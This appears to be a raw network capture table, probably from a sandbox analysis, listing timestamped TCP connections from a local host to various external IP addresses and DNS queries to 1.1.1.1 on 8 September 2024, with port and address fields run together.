                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475028038 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475177050 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475194931 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.475311041 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.477324009 CEST6079880192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.482112885 CEST8060798103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.738254070 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.743776083 CEST806079915.197.240.20192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.744082928 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.744252920 CEST6079980192.168.2.915.197.240.20
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.749908924 CEST806079915.197.240.20192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.096755981 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101613045 CEST8060800103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101687908 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.101811886 CEST6080080192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326131105 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326191902 CEST4971580192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326230049 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326431990 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.328105927 CEST4972580192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.328346968 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329540968 CEST8049707188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329555988 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329591990 CEST4970780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329731941 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329917908 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.331171989 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333199024 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333254099 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333312988 CEST80497253.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333359957 CEST4972580192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333750963 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.334642887 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.338556051 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.340037107 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.344949961 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.347502947 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.347799063 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352590084 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352658987 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.352837086 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.357601881 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.649300098 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790457964 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790597916 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790865898 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790919065 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.791980028 CEST5733480192.168.2.969.162.80.55
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.796761036 CEST805733469.162.80.55192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.818684101 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.821403980 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.852519989 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.857408047 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.964428902 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.964494944 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.970581055 CEST8057338208.100.26.245192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.970655918 CEST5733880192.168.2.9208.100.26.245
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.076623917 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.076726913 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.258678913 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.286087036 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.286144972 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.362303972 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.362584114 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.367954969 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.368037939 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.368252993 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.374229908 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.532174110 CEST8057339188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.532244921 CEST5733980192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.664918900 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901619911 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901678085 CEST44357343188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.901763916 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.902812004 CEST57343443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.902823925 CEST44357343188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979286909 CEST5733780192.168.2.9154.212.231.82
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979569912 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.984143972 CEST8057337154.212.231.82192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.984297037 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036604881 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036645889 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036658049 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036669970 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036683083 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036695004 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036708117 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036708117 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036720991 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036721945 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036736012 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036744118 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036748886 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036762953 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036770105 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036793947 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.036813974 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041578054 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041604042 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041634083 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.041665077 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128845930 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128892899 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128912926 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128925085 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128936052 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128954887 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128968000 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128969908 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128979921 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.128994942 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.129036903 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.129054070 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.129834890 CEST805734291.195.240.19192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.129879951 CEST5734280192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.166145086 CEST80573403.64.163.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.166237116 CEST5734080192.168.2.93.64.163.50
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.274307013 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385297060 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385340929 CEST44357350188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385397911 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385437012 CEST44357350188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385489941 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385530949 CEST44357350188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385613918 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385632992 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385656118 CEST44357350188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385678053 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.385715008 CEST57350443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.387229919 CEST5734780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.392508030 CEST8057347188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.728256941 CEST8057347188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.728326082 CEST5734780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.819145918 CEST8057347188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.819247007 CEST5734780192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.823960066 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.824004889 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.824109077 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.824383020 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:07.824393988 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.077177048 CEST8057341162.255.119.102192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.077241898 CEST5734180192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.280561924 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.280633926 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.281141996 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.281156063 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.281335115 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:08.281341076 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400636911 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400690079 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400696993 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400719881 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400743008 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400763988 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400764942 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400773048 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400804996 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400810957 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400851965 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400854111 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400860071 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400895119 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400898933 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.400954962 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401097059 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401146889 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401165009 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401201010 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401204109 CEST44357351188.114.96.3192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401211977 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:09.401242018 CEST57351443192.168.2.9188.114.96.3
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.289985895 CEST4970880192.168.2.9162.255.119.102
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.616518974 CEST800157349106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.616657972 CEST573498001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.619841099 CEST5734880192.168.2.9103.150.11.230
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.624680996 CEST8057348103.150.11.230192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.965871096 CEST8057348103.150.11.230192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.965931892 CEST5734880192.168.2.9103.150.11.230
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.967032909 CEST573498001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:54:11.971896887 CEST800157349106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.305605888 CEST4972180192.168.2.991.195.240.19
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.325288057 CEST800157349106.15.36.143192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.325345039 CEST573498001192.168.2.9106.15.36.143
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.362050056 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.366925955 CEST8057352103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.367010117 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.368230104 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.373059034 CEST8057352103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.509917974 CEST5735380192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.514734030 CEST8057353103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.514820099 CEST5735380192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.515113115 CEST5735380192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.519889116 CEST8057353103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.565150976 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.565654039 CEST5735480192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570395947 CEST8049751154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570461035 CEST4975180192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570607901 CEST8057354154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.570715904 CEST5735480192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.589468956 CEST5735480192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.594311953 CEST8057354154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.974900007 CEST8057352103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.974920988 CEST8057352103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.974967957 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:12.975019932 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.155999899 CEST8057353103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.156034946 CEST8057353103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.157273054 CEST5735380192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.488347054 CEST8057354154.85.183.50192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.490355968 CEST5735480192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.665184975 CEST5735380192.168.2.9103.224.182.252
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.665255070 CEST5735280192.168.2.9103.224.212.108
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.670214891 CEST8057353103.224.182.252192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.670237064 CEST8057352103.224.212.108192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.907759905 CEST6080180192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.908051968 CEST5735580192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.908184052 CEST5735480192.168.2.9154.85.183.50
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.912699938 CEST8060801199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.912828922 CEST8057355199.59.243.226192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.912921906 CEST5735580192.168.2.9199.59.243.226
                                                                                                                                                                                                          Sep 8, 2024 10:54:13.912961960 CEST8057354154.85.183.50192.168.2.9
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.184592962 CEST6019753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.186197042 CEST6474353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188030958 CEST5606053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.188446999 CEST5866753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.192681074 CEST53505051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.198769093 CEST53560601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215481997 CEST5981053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.215867043 CEST5727753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217689991 CEST53647431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217925072 CEST6546053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.217968941 CEST5394253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225040913 CEST53572771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225395918 CEST53598101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.225936890 CEST5083953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226270914 CEST5146553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.226460934 CEST5500653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.235688925 CEST53654601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.236499071 CEST53514651.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.237612009 CEST53550061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.340415955 CEST53601971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.359174967 CEST53586671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.374366999 CEST53539421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.412106991 CEST53508391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.427602053 CEST4998453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.428092003 CEST6074453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.437822104 CEST53607441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.452250004 CEST5015253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455549002 CEST6213353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST6242253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.455970049 CEST6272553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.458998919 CEST53499841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.459013939 CEST53627481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.464160919 CEST53621331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.466114044 CEST53624221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.468369961 CEST53501521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513669014 CEST6272353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.513932943 CEST5362053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514061928 CEST5305953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514456987 CEST6254253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514765978 CEST6031853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.514969110 CEST5721453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.515242100 CEST5585353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516216040 CEST6408353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516247988 CEST5223753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516614914 CEST5874453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.516887903 CEST5728553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517261028 CEST5181653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517724037 CEST6214953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.517802954 CEST5336553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518204927 CEST5450453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.518501997 CEST6067453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519025087 CEST5790153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519113064 CEST5750253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519613028 CEST5259353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.519926071 CEST6270253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520113945 CEST6339953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.520618916 CEST6276753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:52:34.521822929 CEST6042253192.168.2.91.1.1.1
